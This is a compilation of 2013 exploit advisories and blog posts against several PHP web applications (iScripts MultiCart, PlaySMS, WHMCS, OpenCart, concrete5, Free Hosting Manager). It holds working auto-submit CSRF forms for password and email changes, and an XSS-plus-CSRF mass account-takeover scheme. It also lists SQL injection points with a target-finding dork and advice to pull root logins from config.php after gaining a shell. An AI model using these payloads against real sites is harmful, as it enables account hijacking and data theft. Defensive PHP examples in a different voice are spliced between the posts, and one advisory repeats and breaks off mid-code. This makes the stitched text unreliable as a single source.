# Exploit Title : iScripts MultiCart <= 2.4 Persistent XSS / CSRF / XSS+CSRF Account takeover
# Date : 2013/12/14
# Exploit Author : Saadat Ullah , saadi_linux[at]rocketmail[dot]com
# Software Link : http://www.iscripts.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
# Cross-site Scripting
iScripts MultiCart is a paid shopping cart system. It suffers from persistent XSS and cross-site request forgery, through which an attacker can manipulate user data by sending the victim a crafted URL.
The XSS is in product reviews, so a lot can be done with it: the injected code executes every time the affected product page is visited by a client.
In product_review.php, line 52 (persistent XSS):

    mysql_query("insert into ".$tableprefix."Review (nUserId,nProdId,vDes,vActive) values ('".$_SESSION["sess_userid"]."',
    '".$_POST["pid"]."','".$_POST["txtReview"]."','".$aActive."')") or die(mysql_error());

$_POST['txtReview'] is stored without any sanitizing and is later rendered on the product page as-is.
Exploitation
Go to http://site.tld/product_review.php?pid=[any product id]
Paste your XSS vector into the review field and submit.
The vector is then executed on the product page for the same product id you reviewed:
http://site.tld/productdetails.php?productid=1
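As an added example in PHP (not iScripts code), this is how the review insert and the review display look when the text is stored through a prepared statement and encoded for the HTML context at render time. The `$db` mysqli connection and the names `save_review()`, `h()` and `render_review()` are assumptions; the table and column names are taken from the query quoted above.

```php
<?php
// Added example, not iScripts MultiCart code. Assumes a mysqli connection in $db
// and the Review table/columns from the query quoted in the advisory.

// Store the review with a prepared statement: the text travels as data, so it
// cannot change the SQL. Raw text is fine in the database; encoding belongs at output.
function save_review(mysqli $db, string $prefix, int $userId, int $prodId, string $text, int $active): bool
{
    // Enforce a length limit so a stored payload cannot be arbitrarily large.
    if ($text === '' || strlen($text) > 4000) {
        return false;
    }
    $sql = "INSERT INTO {$prefix}Review (nUserId, nProdId, vDes, vActive) VALUES (?, ?, ?, ?)";
    $stmt = $db->prepare($sql);
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('iisi', $userId, $prodId, $text, $active);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Encode for an HTML body/attribute context. ENT_QUOTES also encodes the single
// quote so the value is safe inside single-quoted attributes; ENT_SUBSTITUTE
// avoids returning an empty string on invalid UTF-8, which would silently drop a review.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Render one review row (as fetched with fetch_assoc()) into HTML.
function render_review(array $row): string
{
    // nl2br after encoding: the <br> tags are ours, the user's text is inert.
    return '<div class="review" data-user="' . h((string) $row['nUserId']) . '">'
         . nl2br(h($row['vDes']))
         . '</div>';
}

// Constructed input of the kind the advisory describes: the script tag is
// rendered as visible text instead of being executed by the browser.
$sample = ['nUserId' => 7, 'vDes' => "Nice cart!\n<script>alert(1)</script>"];
echo render_review($sample), PHP_EOL;
```

The important split is that nothing is "sanitized" on the way in: the database keeps what the user typed, and the single `h()` call at the point where the text meets HTML is what stops the stored payload from running.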
# Cross-site request forgery
<html>
<body onload="javascript:document.forms[0].submit()">
<form name="ex" action="http://localhost/profile.php" method="post">
<input type="hidden" size="30" maxlength="30" name="userid" value="5">
<input type="hidden" size="30" maxlength="30" name="txtFirstName" value="admin">
<input type="hidden" size="30" maxlength="100" name="txtLastName" value="admin">
<input type="hidden" size="30" maxlength="30" name="txtEmail" value="admin@gmail.com">
<input type="hidden" size="30" maxlength="30" name="txtAddress1" value="asdf">
<input type="hidden" size="30" maxlength="30" name="txtCity" value="saf">
<input type="hidden" size="30" maxlength="30" name="bill_country" value="DZ">
<input type="hidden" size="30" maxlength="30" name="bill_state" value="adsf">
<input type="hidden" size="30" maxlength="250" name="btnSaveChanges" value="Save Changes">
<input type="submit" name="btnSaveChanges" class="button" value="Save">
</form>
</body>
</html>
# XSS+CSRF Mass Email Change /Mass Account Takeover
XSS+CSRF can be used to change the e-mail addresses of many users at once; after changing the e-mail, we can change the password too via the forgot-password option, providing the new e-mail.
Just inject a CSRF iframe as the XSS vector on product_review.php, e.g.
<iframe src="http://www.site.tld/inject.html"></iframe>
where inject.html contains the CSRF exploit form above.
So now, whenever users browse the affected products, their e-mail is changed automatically.
#Independent Pakistani Security Researcher
http://www.exploit-db.com/exploits/30177/
# Exploit Title : PlaySMS <= 0.9.9.2 CSRF
# Date : 2013/12/9
# Exploit Author : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link : http://playsms.org/
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
# Cross-site request forgery
PlaySMS is an open source SMS management system. It suffers from cross-site request forgery, through which an attacker can manipulate user data by sending the victim a crafted URL.
PlaySMS does not use any security token to protect against CSRF, so any user data can be manipulated.
PoC and exploit to change the user password:
<html>
<body onload="javascript:document.forms[0].submit()">
<form name="ex" action="http://localhost/playsms/web/index.php?app=menu&inc=user_pref&op=user_pref_save" method="post" enctype="multipart/form-data">
<input type="hidden" size="30" maxlength="30" name="up_password" value="admin">
<input type="hidden" size="30" maxlength="30" name="up_password_conf" value="admin">
<input type="hidden" size="30" maxlength="100" name="up_name" value="admin">
<input type="hidden" size="30" maxlength="30" name="up_email" value="admin@gmail.com">
<input type="hidden" size="30" maxlength="250" name="up_address" value="">
<input type="hidden" size="30" maxlength="100" name="up_city" value="">
<input type="hidden" size="30" maxlength="100" name="up_state" value="">
<input type="hidden" size="10" maxlength="10" name="up_zipcode" value="">
<input type="submit" class="button" value="Save">
</form>
</body>
</html>
#Independent Pakistani Security Researcher
Welcome once again :D
Today I was just browsing 1337day.com and came across an exploit titled "Mybb Ajaxfs Plugin Sql Injection", which they were selling for $150.
http://1337day.com/exploit/description/21541
So I started pentesting the plugin, and in just two minutes I found the bug.
Here are the details:
Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability
Vendors : http://mods.mybb.com/download/ajax-forum-stat-v-2
The plugin is vulnerable through the tooltip and usertooltip parameters in ajaxfs.php.
PoC
Code:
1. The tooltip parameter:

    if(isset($_GET['tooltip']))
    {
        $pid=$_GET['tooltip'];
        $query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'");

2. The usertooltip parameter:

    if(isset($_GET['usertooltip']))
    {
        $uid=$_GET['usertooltip'];
        $query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'");

Requesting http://localhost/Upload/ajaxfs.php?usertooltip=1' returns the MySQL error:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
Google DORK : inurl:ajaxfs.php
#Independent Pakistani Security Researcher
Hi all, I was very busy with my work, so now here comes some new stuff: PHP object injection in all WHMCS versions.
http://packetstormsecurity.com/files/123890/whmcs-phpobject.txt
http://blog.whmcs.com/?t=81138
http://www.securelist.com/en/advisories/55717
# Exploit Title : WHMCS <=5.2.12 PHP Object Injection
# (Web Host Manager Complete Solution)
# Date : 2013/10/24
# Exploit Author : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link : http://www.whmcs.com
# Author HomePage : http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
# PHP Object Injection
# Affected Versions:
WHMCS <=5.2.12
# Vulnerability Description / PoC
The vulnerable code is located in /includes/classes/class.admin.php
The function sortableTableInit() passes $_COOKIE data to unserialize() without sanitizing it.
Code on line 711:

    $sortdata = (isset( $_COOKIE["sortdata"] ) ? $_COOKIE["sortdata"] : "");
    $sortdata = unserialize( base64_decode( $sortdata ) );

User input passed through the cookie is not sanitized before being used in an unserialize() call at line 711. This can be exploited to inject arbitrary PHP objects into the application scope.
Some of the files which call sortableTableInit() are:
/admin/configticketescalations.php
/admin/clientsinvoices.php
/admin/transactions.php
/admin/clientsnotes.php
/admin/affiliates.php
/admin/offlineccprocessing.php
/admin/supportannouncements.php
/admin/supporttickets.php
/admin/systemmailimportlog.php
/admin/clientscredits.php
/admin/clientsquotes.php
/admin/configservers.php
/admin/systemactivitylog.php
/admin/clientslog.php
/admin/clientstransactions.php
/admin/quotes.php
/admin/gatewaylog.php
/admin/systemadminlog.php
/admin/clientsservices.php
/admin/configadmins.php
/admin/todolist.php
/admin/invoices.php
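Added example in PHP, not WHMCS code: the same sort-preference cookie handled without unserialize(). The preference is stored as JSON, authenticated with an HMAC so the client cannot alter it, and only the expected scalar fields are accepted, so no object is ever created from cookie bytes. The names `encode_sortdata()`, `decode_sortdata()`, `ALLOWED_SORT_FIELDS` and the `$secret` value are assumptions; it needs PHP 7.1 or later.

```php
<?php
// Added example, not WHMCS code. Replaces unserialize(base64_decode($cookie))
// with a signed JSON envelope: cookie data can only ever become arrays/scalars.

// Columns the UI is allowed to sort by; anything else is rejected.
const ALLOWED_SORT_FIELDS = ['id', 'date', 'status', 'amount'];

// Build the cookie value: base64(json) . "." . hmac(base64(json)).
function encode_sortdata(string $secret, string $field, string $dir): string
{
    $payload = base64_encode(json_encode(['field' => $field, 'dir' => $dir]));
    $mac = hash_hmac('sha256', $payload, $secret);
    return $payload . '.' . $mac;
}

// Parse and verify the cookie value. Returns ['field' => ..., 'dir' => ...]
// or null on any failure (bad MAC, bad JSON, unexpected keys or values).
function decode_sortdata(string $secret, string $cookie): ?array
{
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$payload, $mac] = $parts;
    // Constant-time comparison so the MAC cannot be recovered byte by byte.
    if (!hash_equals(hash_hmac('sha256', $payload, $secret), $mac)) {
        return null;
    }
    $json = base64_decode($payload, true);
    if ($json === false) {
        return null;
    }
    // json_decode with assoc=true yields arrays only, never objects.
    $data = json_decode($json, true);
    if (!is_array($data) || array_keys($data) !== ['field', 'dir']) {
        return null;
    }
    if (!in_array($data['field'], ALLOWED_SORT_FIELDS, true)
        || !in_array($data['dir'], ['asc', 'desc'], true)) {
        return null;
    }
    return $data;
}

// If unserialize() must stay for compatibility, PHP 7+ can at least refuse to
// instantiate classes: any object in the input becomes __PHP_Incomplete_Class.
function unserialize_no_objects(string $s)
{
    return unserialize($s, ['allowed_classes' => false]);
}

// Constructed demonstration: a genuine value is accepted, a tampered one is not.
$secret = 'replace-with-a-random-server-side-secret';   // placeholder, not a real key
$good = encode_sortdata($secret, 'date', 'desc');
$tampered = substr($good, 0, 4) . 'x' . substr($good, 5);
echo decode_sortdata($secret, $good) === null ? "genuine: rejected" : "genuine: accepted", PHP_EOL;
echo decode_sortdata($secret, $tampered) === null ? "tampered: rejected" : "tampered: accepted", PHP_EOL;
```

The MAC check happens before the payload is decoded at all, so a crafted cookie never reaches json_decode(); and because the server generates every valid cookie itself, the strict key and value checks cost nothing for legitimate users.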
#Independent Pakistani Security Researcher
Hi, for the last few days I have been pentesting OpenCart, a shopping cart system.
www.opencart.com
I found that the latest OpenCart version is vulnerable to CSRF inside the user panel.
You can edit the user's password and all other account data.
So I wrote the final description of the vulnerability and sent it to the exploit database sources.
The next day I got a reply from the Packet Storm Security team that the OpenCart CSRF had already been reported to them, and they sent me the link.
What I found is that it was discovered in old versions and reported in 2010.
Ahhh, now this is quite embarrassing: the latest version is still vulnerable :(
I set up the latest version again and found it is still vulnerable.
I don't know why this vulnerability has not been patched by the OpenCart development team, as it was already reported by different security researchers.
Okay, so here is the exploit:
http://www.securelist.com/en/advisories/53036
http://www.exploit-db.com/exploits/24921/
# Exploit Title : OpenCart CSRF
# Date : 2013/4/2
# Exploit Author : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link : http://www.opencart.com/index.php?route=download/download
: https://github.com/opencart
# Software web : www.opencart.com
# Author HomePage : http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
# Cross-site request forgery
OpenCart is an open source shopping cart system. It suffers from cross-site request forgery, through which an attacker can manipulate user data by sending the victim a crafted URL.
OpenCart does not use any security token to protect against CSRF.
All locations inside the user panel are vulnerable.
Header
----------------------------------------------------------
http://localhost/index.php?route=account/password
POST /index.php?route=account/password HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=e634322aa558022cdd8664b8d32124b7; language=en; currency=USD
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------2465524120551
Content-Length: 257
-----------------------------2465524120551
Content-Disposition: form-data; name="password"
123456789
-----------------------------2465524120551
Content-Disposition: form-data; name="confirm"
123456789
-----------------------------2465524120551--
Response
HTTP/1.1 302 Found
Date: Tue, 02 Apr 2013 14:49:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 302
Location: http://localhost/index.php?route=account/account
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
----------------------------------------------------------
Simple PoC to change the user password:
<form action="http://localhost/index.php?route=account/password" method="post" enctype="multipart/form-data">
<div class="content">
<table class="form">
<tbody><tr>
<td><input name="password" value="987654321" type="hidden">
</td>
</tr>
<tr>
<td><input name="confirm" value="987654321" type="hidden">
</td>
</tr>
</tbody></table>
</div>
<div class="buttons">
<div class="right"><input value="Continue" class="button" type="submit"></div>
</div>
</form>
OpenCart <= 1.5.6.1 SQL Injection
#Independent Pakistani Security Researcher
Hi, today: OpenCart.
I just set up OpenCart to give it a pen-test, and here are the initial results.
Okay, the bug:
OpenCart discloses the local path of the server in many locations. Some of them are:
http://localhost/opencart/upload/catalog/controller/account/address.php
http://localhost/opencart/upload/catalog/controller/account/account.php
http://localhost/opencart/upload/catalog/controller/account/order.php . . . etc.
Live demo
OpenCart's own domain:
http://demo.opencart.com/catalog/controller/account/address.php
http://spotonsolutions.net/catalog/controller/account/address.php
How this issue arises, and patching
When you include several PHP files from one file, and a variable or function is declared in the first file and used in the second file you included, then if anyone accesses that second file directly they get an error such as:
Undefined variable...
Class not found...
For example, we have index.php with the code:

    include('1.php');
    include('2.php');

Code of 1.php:

    class a {
        public $count = 0;
    }

Code of 2.php:

    $obj = new a();

Now, as you can see, if you access 2.php directly you get the error:
Class 'a' not found
because class a is defined in 1.php.
But if you access index.php it works perfectly, as class a is defined in 1.php and then 2.php uses that class.
So this is how local path disclosure (LPD) often occurs: PHP prints the fatal error together with the full filesystem path of the script.
Patching
The simplest patch: turn error reporting off.
Or you can also use .htaccess in the directory of the included files:

    Order deny,allow
    Deny from all

Or you can do this:
Declare a constant in index.php (or whichever file is going to include 1.php and 2.php), like:

    if (!defined('direct access')) {
        define('direct access', true);
    }

and then just add this at the top of 1.php and 2.php:

    defined('direct access') or die("Access Denied.");

What it does is simple: the main file declares a constant, and the included files check whether that constant is set. As you already set it in the main file, everything runs perfectly.
But if you access the included files directly, the check finds the constant unset and the script dies showing "Access Denied." instead of the error.
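As an added example in PHP (not OpenCart code), here is an audit script for the third patch above: it walks a directory of include-only files, reports every .php file whose first lines lack the `defined('direct access') or die(...)` guard, and also flags the error-display settings that turn a "Class not found" fatal into a path disclosure in the first place. The constant name follows the snippet above; the function names and the directory argument are assumptions.

```php
<?php
// Added example, not OpenCart code. Usage: php audit.php /path/to/catalog/controller
// Reports include-only PHP files that lack the direct-access guard and the PHP
// settings that would print a fatal error (with the full script path) to clients.

const GUARD_CONSTANT = 'direct access';   // constant name used in the patch above

// Returns true when one of the file's first 20 lines contains the guard.
function has_direct_access_guard(string $path): bool
{
    $handle = fopen($path, 'r');
    if ($handle === false) {
        return false;
    }
    $lines = 0;
    $found = false;
    $pattern = '/defined\(\s*[\'"]' . preg_quote(GUARD_CONSTANT, '/') . '[\'"]\s*\)\s*or\s*(die|exit)/i';
    while ($lines < 20 && ($line = fgets($handle)) !== false) {
        $lines++;
        if (preg_match($pattern, $line)) {   // e.g. defined('direct access') or die("Access Denied.");
            $found = true;
            break;
        }
    }
    fclose($handle);
    return $found;
}

// Lists every .php file under $dir (recursively) that lacks the guard.
function unguarded_php_files(string $dir): array
{
    $missing = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if ($file->isFile() && strtolower($file->getExtension()) === 'php'
            && !has_direct_access_guard($file->getPathname())) {
            $missing[] = $file->getPathname();
        }
    }
    sort($missing);
    return $missing;
}

// The guard hides the symptom; these settings decide whether an unguarded
// file's fatal error is shown to the client or only written to the log.
function error_display_findings(): array
{
    $findings = [];
    if (filter_var(ini_get('display_errors'), FILTER_VALIDATE_BOOLEAN)) {
        $findings[] = 'display_errors is on: fatal errors print the script path to the client';
    }
    if (!filter_var(ini_get('log_errors'), FILTER_VALIDATE_BOOLEAN)) {
        $findings[] = 'log_errors is off: errors are not recorded server-side';
    }
    return $findings;
}

$dir = $argv[1] ?? __DIR__;
foreach (unguarded_php_files($dir) as $path) {
    echo "no direct-access guard: $path", PHP_EOL;
}
foreach (error_display_findings() as $finding) {
    echo "config: $finding", PHP_EOL;
}
```

Run it against the web root after applying the patch; a clean run means every included file refuses direct requests and, should one be missed, the error goes to the log rather than to the browser.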
So, that's it for today.
# Independent Pakistani Security Researcher
Hi, today: Concrete.
Concrete (concrete5) is a well-known content management system. For more, see
www.concrete5.org
So I was just pen-testing it a bit and initially found that it does not use any security token to protect the logout action, so admins/users can be logged out by CSRF:
http://localhost/concrete/index.php/login/logout/
In simple terms, just sending this link to any user with a valid session will log them out.
Header:
GET http://localhost/concrete/index.php/login/logout/
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: CONCRETE5=garsp3c29rflks37hk16jda510
Connection: keep-alive
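Added example in PHP, not code from iScripts, PlaySMS, OpenCart or concrete5: the synchronizer-token protection that the profile.php, user_pref_save and account/password forms in the posts above lack, applied as well to the logout action here, which stops being a plain GET link. The function names (`csrf_token()`, `csrf_field()`, `csrf_check()`, `handle_password_change()`, `handle_logout()`) are assumptions; it needs PHP 7 for random_bytes().

```php
<?php
// Added example, not vendor code. Synchronizer-token CSRF protection for the
// kind of state-changing requests shown in the advisories above.

session_start();

// One token per session, generated from a CSPRNG and reused across forms.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to embed in every form that changes state.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
         . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// True only for a POST carrying the session's token. A page on another origin
// cannot read the victim's token, so its auto-submitted form fails here.
function csrf_check(array $post, string $method): bool
{
    if ($method !== 'POST' || !isset($_SESSION['csrf_token'])) {
        return false;
    }
    $sent = $post['csrf_token'] ?? '';
    return is_string($sent) && hash_equals($_SESSION['csrf_token'], $sent);
}

// Password change: verify the token before touching the account.
function handle_password_change(array $post, string $method): string
{
    if (!csrf_check($post, $method)) {
        http_response_code(403);
        return 'Request rejected: missing or invalid CSRF token.';
    }
    if (($post['password'] ?? '') === '' || $post['password'] !== ($post['confirm'] ?? null)) {
        return 'Passwords do not match.';
    }
    // ... update the password of $_SESSION['user_id'] here (assumed storage) ...
    return 'Password changed.';
}

// Logout is a state change too: require POST plus the token, so that a link,
// image or hidden form on another site cannot end the session.
function handle_logout(array $post, string $method): string
{
    if (!csrf_check($post, $method)) {
        http_response_code(403);
        return 'Logout rejected.';
    }
    $_SESSION = [];
    session_destroy();
    return 'Logged out.';
}

// Constructed demonstration: the same field set as the PoC forms above, once
// without a token (as a cross-site form would send it) and once with it.
$forged = ['password' => '987654321', 'confirm' => '987654321'];
$genuine = $forged + ['csrf_token' => csrf_token()];
echo handle_password_change($forged, 'POST'), PHP_EOL;
echo handle_password_change($genuine, 'POST'), PHP_EOL;
echo csrf_field(), PHP_EOL;   // what the application's own forms would embed
```

Setting the session cookie with the SameSite attribute is a worthwhile second layer, but the token check is the one that works regardless of browser support, and it must cover every state-changing route, including "harmless" ones like logout.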
Okay, XSS
I found an XSS inside the admin panel; it requires admin access, but still everything should be secure.
Bug
Concrete is not sanitizing the POST field for post tags.
When you are writing a post to publish on the blog, there is an option to enter tags for the post.
This POST field is vulnerable to XSS.
Go to Write Post inside the admin panel, enter any XSS vector in the tag field and you will see the result.
And it is stored/persistent XSS.
So that's it for today.
#independent Pakistani Security Researcher
Hi, for today: Free Hosting Manager. Free Hosting Manager is a free script to install and run your own hosting business.
It lets clients register and then order hosting, and so on. The script is highly vulnerable; moreover, if you successfully upload a shell or have server access, you can symlink to get the root WHM logins:
Free Hosting Manager stores the root logins in config.php.
So if you shell it, you should check config.php for the root logins.
Exploit Links
http://www.exploit-db.com/exploits/24879
http://packetstormsecurity.com/files/120920/Free-Hosting-Manager-2.0.2-SQL-Injection.html
http://1337day.com/exploit/20555
Exploit Details
-------------------------------------------------------------------------
# Software : Free Hosting Manager V2.0.2 Multiple SQLi
# Author : Saadat Ullah , saadi_linux@rocketmail.com
# Author home : http://security-geeks.blogspot.com
# Date : 23/3/13
# Vendors : http://www.fhm-script.com
# Download Link : http://www.fhm-script.com/download.php
-------------------------------------------------------------------------
+---+[ Multiple SQL injection]+---+
It is vulnerable to SQLi in many files; some of them are:
http://localhost/Free/clients/reset.php?code=[SQLi]
http://localhost/Free/clients/tickets.php?id=[SQLi]
http://localhost/free/clients/viewaccount.php?id=[SQLi]
Cookie-based injection in
http://localhost/free/clients/home.php
(inject into the cookie value clientuser)
http://localhost/free/clients/register.php ---> SQLi on all POST fields.
Proof of Concept
In home.php
It calls a function auth(), which is:
    if ((isset($_COOKIE['clientuser'])) && isset($_COOKIE['clientpass']) && isset($_COOKIE['clientid'])) {
        $clientuser = $_COOKIE['clientuser'];
        $clientpass = $_COOKIE['clientpass'];
        $clientid = $_COOKIE['clientid'];
        $this->clientuser = $_COOKIE['clientuser'];
        $this->clientpass = $_COOKIE['clientpass'];
        $this->clientid = $_COOKIE['clientid'];
        return true;
    $dbquery = @mysql_query("SELECT * FROM clients WHERE id='$clientid' AND username='$clientuser' AND password='$clientpass'") or die(mysql_error());
In reset.php
http://localhost/Free/clients/reset.php?code=[SQLi]

    elseif ((isset($code)) || ($_GET['do'] == "code")) {
        $details = mysql_query("SELECT * FROM clientpwactivation WHERE activationcode='$code'")
            or die(mysql_error());

In tickets.php
http://localhost/Free/clients/tickets.php?id=[SQLi]

    if ((isset($_GET['id'])) && ($_GET['action'] == "close") && ($_GET['confirm'] == "true")) {
        $fhm->closeticket($_GET['id']);
    ...
    $checkticket = mysql_query("SELECT * FROM tickets WHERE id='$ticket' AND clientid='$this->clientid'") or die(mysql_error());

In viewaccount.php
http://localhost/free/clients/viewaccount.php?id=[SQLi]

    $id = $_GET['id'];
    ...
    $getacct = mysql_query("SELECT * FROM orders WHERE id='$id' AND clientid='$fhm->clientid'") or die(mysql_error());

In register.php

    $firstname = stripslashes($_POST['first_name']);
    $lastname = stripslashes($_POST['last_name']);
    $company = stripslashes($_POST['company']);
    $address = stripslashes($_POST['address']);
    $address2 = stripslashes($_POST['address_2']);
    $country = stripslashes($_POST['country']);
    $city = stripslashes($_POST['city']);
    $state = stripslashes($_POST['state_region']);
    $postcode = stripslashes($_POST['postal_code']);
    $telnumber = stripslashes($_POST['tel_number']);
    $faxnumber = stripslashes($_POST['fax_number']);
    $emailaddress = stripslashes($_POST['email_address']);
    $username = stripslashes($_POST['username']);
    $password1 = stripslashes($_POST['password']);
    $password2 = stripslashes($_POST['confirm_password']);
    ...
    $insertuser = mysql_query("INSERT INTO clients VALUES('', '$username', '$md5pass', '$firstname', '$lastname', '$company', '$address', '$address2', '$city', '$country', '$state', '$postcode', '$telnumber', '$faxnumber', '$emailaddress', '$startingcredits', '1', '', '', '$timestamp') ")

register.php only uses stripslashes(), which does not protect against SQL injection at all.
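As an added example in PHP (neither Free Hosting Manager nor MyBB Ajaxfs code), the three query shapes from this advisory and the tooltip/usertooltip lookups from the MyBB post above, rewritten with typed input handling and prepared statements. `$db` is an assumed mysqli connection (with mysqlnd, for get_result()); the function names are assumptions; table names follow the snippets above, and the column names in the INSERT are assumed, since the original INSERT uses positional values.

```php
<?php
// Added example, not vendor code. Validates ids as integers, binds strings as
// parameters, and replaces stripslashes()+md5 with real validation and a password hash.

// Numeric ids (tickets.php?id=, viewaccount.php?id=, ajaxfs.php?tooltip=/usertooltip=):
// accept only a positive integer before the value gets anywhere near SQL.
function positive_int($value): ?int
{
    $n = filter_var($value, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $n === false ? null : $n;
}

// tickets.php: the ticket must belong to the logged-in client.
function fetch_client_ticket(mysqli $db, $rawId, int $clientId): ?array
{
    $id = positive_int($rawId);
    if ($id === null) {
        return null;                       // "1'" and similar stop here
    }
    $stmt = $db->prepare('SELECT * FROM tickets WHERE id = ? AND clientid = ?');
    $stmt->bind_param('ii', $id, $clientId);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// reset.php?code=: the activation code is a string, so it is bound as one; the
// value travels separately from the SQL text and cannot change the query.
function fetch_activation(mysqli $db, string $code): ?array
{
    if (!preg_match('/^[A-Za-z0-9]{8,64}$/', $code)) {
        return null;                       // shape check before the round trip
    }
    $stmt = $db->prepare('SELECT * FROM clientpwactivation WHERE activationcode = ?');
    $stmt->bind_param('s', $code);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// register.php: stripslashes() is not an escaping function. Every field is
// bound, and the password is hashed with password_hash() rather than md5.
function register_client(mysqli $db, array $post): bool
{
    foreach (['username', 'first_name', 'last_name', 'email_address'] as $f) {
        if (!isset($post[$f]) || !is_string($post[$f]) || $post[$f] === '') {
            return false;
        }
    }
    if (!filter_var($post['email_address'], FILTER_VALIDATE_EMAIL)) {
        return false;
    }
    if (($post['password'] ?? '') === '' || $post['password'] !== ($post['confirm_password'] ?? null)) {
        return false;
    }
    $hash = password_hash($post['password'], PASSWORD_DEFAULT);
    // Column names assumed; the original INSERT lists values positionally.
    $stmt = $db->prepare(
        'INSERT INTO clients (username, password, firstname, lastname, emailaddress) VALUES (?, ?, ?, ?, ?)'
    );
    $stmt->bind_param('sssss', $post['username'], $hash, $post['first_name'], $post['last_name'], $post['email_address']);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}
```

The same `positive_int()` check is the whole fix for the MyBB plugin's `pid`/`uid` lookups: once the value is an int, the quoted interpolation the error message came from cannot be broken out of, and the prepared statement makes the point moot for the string fields.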
#independent Pakistani Security Researcher
Its includes clients register their and then order hosting and blah blah..so the script is highly vulnerable plus if you successfully upload the shell or have server access you do symlink to get the root whm logins.
Free hosting manager store root logins in config.php
So if you shell it you should check config.php for root logins.
Exploit Links
http://www.exploit-db.com/exploits/24879
http://packetstormsecurity.com/files/120920/Free-Hosting-Manager-2.0.2-SQL-Injection.html
http://1337day.com/exploit/20555
Exploit Details
-------------------------------------------------------------------------
# Software : Free Hosting Manager V2.0.2 Multiple SQLi
# Author : Saadat Ullah , saadi_linux@rocketmail.com
# Author home : http://security-geeks.blogspot.com
# Date : 23/3/13
# Vendors : http://www.fhm-script.com
# Download Link : http://www.fhm-script.com/download.php
-------------------------------------------------------------------------
+---+[ Multiple SQL injection]+---+
Its is vulnerable to SQLi on many file some of them are..
http://localhost/Free/clients/reset.php?code=[SQLi]
http://localhost/Free/clients/tickets.php?id=[SQLi]
http://localhost/free/clients/viewaccount.php?id=[SQLi]
Cookie based injeciton In
http://localhost/free/clients/home.php
inject the cookie value clientuser
http://localhost/free/clients/register.php ---> SQLi on all POST Fields.
Proof Of Concept
In home.php
Calling a function auth() and what it is
if ((isset($_COOKIE['clientuser'])) && isset($_COOKIE['clientpass']) && isset($_COOKIE['clientid'])) {
$clientuser = $_COOKIE['clientuser'];
$clientpass = $_COOKIE['clientpass'];
$clientid = $_COOKIE['clientid'];
$this->clientuser = $_COOKIE['clientuser'];
$this->clientpass = $_COOKIE['clientpass'];
$this->clientid = $_COOKIE['clientid'];
return true;
$dbquery = @mysql_query("SELECT * FROM clients WHERE id='$clientid' AND username='$clientuser' AND password='$clientpass'") or die(mysql_error());
In Reset.php
http://localhost/Free/clients/reset.php?code=[SQLi]
elseif ((isset($code)) || ($_GET['do'] == "code")) {
$details = mysql_query("SELECT * FROM clientpwactivation WHERE activationcode='$code'")
or die(mysql_error());
In tickets.php
http://localhost/Free/clients/tickets.php?id=[SQLi]
if ((isset($_GET['id'])) && ($_GET['action'] == "close") && ($_GET['confirm'] == "true")) {
$fhm->closeticket($_GET['id']);
.
.
$checkticket = mysql_query("SELECT * FROM tickets WHERE id='$ticket' AND clientid='$this->clientid'") or die(mysql_error());
In Viewaccount.php
http://localhost/free/clients/viewaccount.php?id=[SQLi]
$id = $_GET['id'];
.
$getacct = mysql_query("SELECT * FROM orders WHERE id='$id' AND clientid='$fhm->clientid'") or die(mysql_error());
In register.php
$firstname = stripslashes($_POST['first_name']);
$lastname = stripslashes($_POST['last_name']);
$company = stripslashes($_POST['company']);
$address = stripslashes($_POST['address']);
$address2 = stripslashes($_POST['address_2']);
$country = stripslashes($_POST['country']);
$city = stripslashes($_POST['city']);
$state = stripslashes($_POST['state_region']);
$postcode = stripslashes($_POST['postal_code']);
$telnumber = stripslashes($_POST['tel_number']);
$faxnumber = stripslashes($_POST['fax_number']);
$emailaddress = stripslashes($_POST['email_address']);
